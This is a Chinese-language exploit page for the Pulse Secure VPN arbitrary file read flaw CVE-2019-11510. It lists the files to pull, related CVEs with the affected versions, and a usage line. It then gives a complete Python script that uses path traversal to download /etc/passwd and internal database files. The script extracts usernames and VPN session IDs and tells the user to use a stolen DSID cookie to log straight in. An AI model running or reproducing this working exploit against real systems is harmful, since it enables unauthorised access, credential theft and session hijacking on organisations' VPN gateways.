Pulse Secure 任意文件读取(CVE-2019-11510)漏洞
- /etc/passwd
- /etc/hosts
- /data/runtime/mtmp/system
- /data/runtime/mtmp/lmdb/dataa/data.mdb
- /data/runtime/mtmp/lmdb/dataa/lock.mdb
- /data/runtime/mtmp/lmdb/randomVal/data.mdb
- /data/runtime/mtmp/lmdb/randomVal/lock.mdb
- CVE-2019-11510 - Pre-auth Arbitrary File Reading
- CVE-2019-11542 - Post-auth Stack Buffer Overflow
- CVE-2019-11539 - Post-auth Command Injection
- CVE-2019-11538 - Post-auth Arbitrary File Reading
- CVE-2019-11508 - Post-auth Arbitrary File Writing
- CVE-2019-11540 - Post-auth Session Hijacking
漏洞编号 影响版本
CVE-2019-11510 Pulse Connect Secure: 9.0RX 8.3RX 8.2RX
CVE-2019-11542 Pulse Connect Secure: 9.0RX 8.3RX 8.2RX 8.1RX 和 Pulse Policy Secure:9.0RX 5.4RX 5.3RX 5.2RX 5.1RX
CVE-2019-11539 Pulse Connect Secure: 9.0RX 8.3RX 8.2RX 8.1RX 和 Pulse Policy Secure: 9.0RX 5.4RX 5.3RX 5.2RX 5.1RX
CVE-2019-11538 Pulse Connect Secure: 9.0RX 8.3RX 8.2RX 8.1RX
CVE-2019-11508 Pulse Connect Secure: 9.0RX 8.3RX 8.2RX 8.1RX
CVE-2019-11540 Pulse Connect Secure: 9.0RX 8.3RX 和 Pulse Policy Secure: 9.0RX 5.4RX
使用:python exp.py https://sslvpn.target.com/
import requests import requests.packages.urllib3 requests.packages.urllib3.disable_warnings() import os import sys from urllib.parse import urlparse,urljoin banner = ''' _______ ________ ___ ___ __ ___ __ __ _____ __ ___ / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ /_ | ____/_ |/ _ \ | | \ \ / /| |__ ______ ) | | | || | (_) |______| || | |__ | | | | | | | \ \/ / | __|______/ /| | | || |\__, |______| || |___ \ | | | | | | |____ \ / | |____ / /_| |_| || | / / | || |___) || | |_| | \_____| \/ |______| |____|\___/ |_| /_/ |_||_|____/ |_|\___/ python By StudyCat ''' print (banner) def exp(url): netloc = urlparse(url)[1] path = urlparse(url)[2] if path == '/': url = url elif path == '': url = url+'/' else: print("URL Error") return r = requests.get(url+'data-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/', verify=False) if r.status_code == 200 and 'root:x:0:0:root' in r.text: print(url + " ---------------> Vulnerable\n") print('Extracting /etc/passwd') print ("Writing all files to output dir " + netloc) if not os.path.exists(netloc): os.mkdir(netloc) print(r.text+"\n") f = open(netloc+'/passwd','a') f.write(r.text) f.close() r = requests.get(url+'data-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/', verify=False) if r.status_code == 200: print('Extracting /etc/hosts') print(r.text) f = open(netloc+'/hosts','a') f.write(r.text+"\n") f.close() print('Downloading /data/runtime/mtmp/lmdb/dataa/data.mdb to extract plaintext usernames and password') r = requests.get(url+'data-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/', verify=False) if r.status_code == 200: f = open(netloc+"/data_runtime_mtmp_lmdb_dataa_data.mdb",'ab') f.write(r.content) f.close() f = open('data_runtime_mtmp_lmdb_dataa_data.mdb','rb') users = [] buf = f.readline() while buf: n = buf.count(b'CN=') if n>0: for i in range(n): if i : indexx = buf.find(b'CN=',indexx+1) else: indexx = buf.find(b'CN=') t = buf[indexx:indexx+100] end = t.find(b'\x00') t = buf[indexx:indexx+end] users.append(t.decode()) buf = f.readline() f.close() users = list(set(users)) f = open(netloc+"/users.txt","a") for line in users: f.write(line+"\n") f.close() print("Downloading /data/runtime/mtmp/lmdb/randomVal/data.mdb to extract sessionids, Use DSID=SESSIONID; as cookie to login directly into vpn") r = requests.get(url+'data-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/randomVal/data.mdb?/dana/html5acc/guacamole/', verify=False) if r.status_code == 200: f = open(netloc+"/data_runtime_mtmp_lmdb_randomVal_data.mdb",'ab') f.write(r.content) f.close() f = open(netloc+"/data_runtime_mtmp_lmdb_randomVal_data.mdb",'rb') sessionids = [] buf = f.readline() while buf: n = buf.count(b'randomVal') if n>0: for i in range(n): if i : indexx = buf.find(b'randomVal',indexx+9) else: indexx = buf.find(b'randomVal') t = buf[indexx:indexx+41] if len(t)==41 and b'\x00' not in t: sid = t[9:].decode() sessionids.append(sid) buf = f.readline() f.close() sessionids = list(set(sessionids)) f = open(netloc+'/sessionids.txt','a') for sid in sessionids: print(sid) f.write(sid+"\n") f.close() else: print(url + " ---------------> Not Vulnerable") def main(): url = sys.argv[1] exp(url) if __name__ == '__main__': main()